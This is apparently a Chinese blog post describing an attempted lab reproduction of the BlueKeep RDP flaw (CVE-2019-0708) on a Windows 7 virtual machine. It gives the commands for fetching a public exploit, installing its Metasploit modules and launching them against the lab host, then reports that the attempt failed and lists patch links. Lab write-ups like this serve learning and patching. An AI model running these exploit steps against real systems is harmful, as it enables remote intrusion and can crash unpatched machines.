CVE-2019-0708:RDP漏洞复现
参考链接:CVE-2019-0708:RDP漏洞复现
注:复现并记录一下(实操才能让人记忆)
0x00 漏洞概述
CVE-2019-0708是微软于2019年05月14日发布的一个严重的RDP远程代码执行漏洞。该漏洞无需身份认证和用户交互,可能形成蠕虫爆发,影响堪比wannycry。
2019年09月07日,@rapid7 在其metasploit-framework仓库公开发布了CVE-2019-0708的利用模块,漏洞利用工具已经开始扩散,已经构成了蠕虫级的攻击威胁。
0x01 影响版本
Windows 7
Windows Server 2008 R2
Windows Server 2008
Windows 2003
Windows XP
Windows 8和Windows 10及之后版本的用户不受此漏洞影响
0x02 漏洞原理
由于对象指针在释放后再次被使用而引发UAF漏洞,详情见
https://www.anquanke.com/post/id/181577
0x03 环境搭建
本次复现的版本为Windows7-sp1
Vmware环境下载链接:
win7 sp1:
ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A8078|/
注:推荐使用迅雷下载,复制win7的链接,打开迅雷,没会员都还是挺快的。如果要下别的系统版本,可以去MSDN搞一波
Kali:https://www.kali.org/downloads/
以上环境自行百度安装即可。
环境准备:
Windows7-sp1:192.168.63.140
kali:192.168.63.152
windows7-sp1准备:开启3389

kali准备:下载需要的文件
git clone https://github.com/TinToSer/bluekeep-exploit

可以看到有4个.rb后缀的文件,将他们放到相应的目录下(rdp目录需要自己创建)

cp rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/
cp rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
cp cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
cp cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/
然后就去相应的目录查看文件是否复制成功。
注:我自己这里将cve_2019_0708_bluekeep_rce.rb复制到相应目录后,并执行了reload_all,但是在使用该模块的时候,会报错说加载该模块失败,尝试了网上的什么改777权限啊什么的,都试了一次,并无卵用,也许是我太菜了。我尝试更新metasploit-framework,更新之后,你说气不气,肝了半天的原因,一个更新解决了。。。我不气,一点都不气
0x04 漏洞利用-Windows7
启动msf:msfconsole
重新加载所有模块:reload_all
搜索漏洞模块:search 2019-0708

使用攻击模块:use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
设置目标主机:set rhosts 192.168.63.140
设置目标端口:set rport 3389
设置target:show targets

我的VMware是15.5.6

自觉选择target 4:set target 4

准备完毕,开炮:run

梦想很美好,现实却。。。
根据下面的复现失败的tip试了,没啥用,估计是我太辣鸡了。。。
不弄了,以后实在没办法再弄这个吧。。。
0x05 漏洞修复
下载补丁:
Win7 sp1:
http://download.windowsupdate.com/d/msdownload/update/software/secu/2019/05/windows6.1-kb4499175-x64_3704acfff45ddf163d8049683d5a3b75e49b58cb.msu
Win08 R2:
http://download.windowsupdate.com/c/msdownload/update/software/secu/2019/05/windows6.1-kb4499175-x64_3704acfff45ddf163d8049683d5a3b75e49b58cb.msu
复现失败的一些小tip:
1、确认目录下已经拷贝了相应文件
2、确认3389开启,msf中reload_all执行
3、kali的内存给3个G左右
4、多切换target
5、多run几次!(重点)
小结:目前exp还很不稳定,建议大家在实战中暂时不要使用,如果打蓝屏可能会造成很严重的后果。复现时可能会出现诸多问题,但是只要耐心地多尝试几次总会成功的。
注:各位大哥,有成功的给小弟我讲讲吧,让我羡慕羡慕。。。哎,学习太难了!!!

浙公网安备 33010602011771号